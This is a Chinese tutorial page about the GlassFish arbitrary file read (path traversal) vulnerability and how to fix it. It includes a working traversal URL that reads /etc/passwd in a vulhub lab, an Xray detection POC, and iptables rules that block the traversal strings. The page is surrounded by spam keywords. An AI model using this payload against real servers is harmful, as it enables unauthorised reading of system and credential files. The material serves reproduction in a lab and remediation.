亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

GlassFish任意文件讀取漏洞怎么修復

發布時間:2021-12-29 17:42:28 來源:億速云 閱讀:358 作者:小新 欄目:網絡管理

小編給大家分享一下GlassFish任意文件讀取漏洞怎么修復,相信大部分人都還不怎么了解,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧!

GlassFish 任意文件讀取漏洞

Port : 4848

漏洞原理

glassfish 是一款 java 編寫的跨平臺的開源的應用服務器

java語言中會把 %c0%ae解析為 \uC0AE,最后轉義為ASCCII字符的.(點)。利用 %c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/來向上跳轉,達到目錄穿越、任意文件讀取的效果。所以 glassfish 這個 poc 實際上就是../../../../../../../../../../../etc/passwd。

影響版本:

< 4.1.1(不含 4.1.1)

漏洞復現

如下測試環境借助 vulhub 的 docker 鏡像,附上 P 師傅的鏈接:https://github.com/vulhub/vulhub?

編譯、運行測試環境,本環境超級管理員密碼在 docker-compose.yml中設置,默認為 vulhub_default_password,在4848端口利用該密碼可以登錄管理員賬戶。

docker-compose up -d

環境運行后,訪問 http://your-ip:8080http://your-ip:4848即可查看 web 頁面。其中,8080 端口是網站內容,4848 端口是 GlassFish 管理中心。

GlassFish任意文件讀取漏洞怎么修復

無需登錄,直接訪問 https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd,發現已成功讀取 /etc/passwd內容:

GlassFish任意文件讀取漏洞怎么修復

POC & EXP

如下是 Xray 的 POC,其只穿越了上級目錄,檢測了版本信息,不涉及敏感信息,但同樣也驗證了漏洞存在。

name: poc-yaml-glassfish-cve-2017-1000028-lfi
rules:
  - method: GET
    path: /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF
    follow_redirects: true
    expression: |
      response.status == 200 && response.body.bcontains(b"Ant-Version:") && response.body.bcontains(b"Manifest-Version:")
detail:
  version: <4.1.0
  author: sharecast
  links:
    - https://github.com/vulhub/vulhub/tree/master/glassfish/4.1.0

GlassFish任意文件讀取漏洞怎么修復

漏洞修復

1. 關閉遠程管理關閉遠程管理,關閉后只允許本地訪問,會提示要求輸入用戶名和密碼,開發環境或者對服務器安全要求較高的環境可以選擇這么做,修改該設置后應該重啟 GlassFish 服務

./asadmin change-admin-password ./asadmin disable-secure-admin ./asadmin stop-domain ./asadmin start-domain asadmin.bat change-admin-password asadmin.bat disable-secure-admin asadmin.bat stop-domain asadmin.bat start-domain

需要注意的是,關閉遠程訪問只能禁用遠程 login 登錄,但是攻擊 url 還是可以訪問,任意文件讀取依然存在

2. IPtables 規則

iptables -I INPUT -p tcp --dport 4848 -m string --to 120 --algo bm --string '..\%c0\%af' -j DROP  
iptables -I INPUT -p tcp --dport 4848 -m string --to 120 --algo bm --string '\%c0\%ae/' -j DROP  
iptables -I INPUT -p tcp --dport 4848 -m string --to 120 --algo bm --string '../' -j DROP   
//該規則無法防御HTTPS SSL方案

3. 禁用 web.xml theme 映射\glassfish5\glassfish\lib\install\applications__admingui\WEB-INF\web.xml

<!--
    <servlet-mapping><servlet-name>ThemeServlet</servlet-name><url-pattern>/theme/*</url-pattern></servlet-mapping>
-->

重啟 glassfish 后生效

以上是“GlassFish任意文件讀取漏洞怎么修復”這篇文章的所有內容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內容對大家有所幫助,如果還想學習更多知識,歡迎關注億速云行業資訊頻道!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

河源市| 日土县| 南江县| 乌拉特中旗| 建德市| 张家港市| 朔州市| 镇巴县| 岳阳市| 汾阳市| 曲水县| 当涂县| 临夏县| 泉州市| 新营市| 广州市| 杭锦旗| 莱芜市| 甘谷县| 航空| 达拉特旗| 尉氏县| 思茅市| 雷波县| 深水埗区| 安平县| 隆林| 景东| 长武县| 措美县| 通城县| 凤阳县| 北安市| 樟树市| 平山县| 桑日县| 三明市| 潞城市| 若尔盖县| 图们市| 永年县|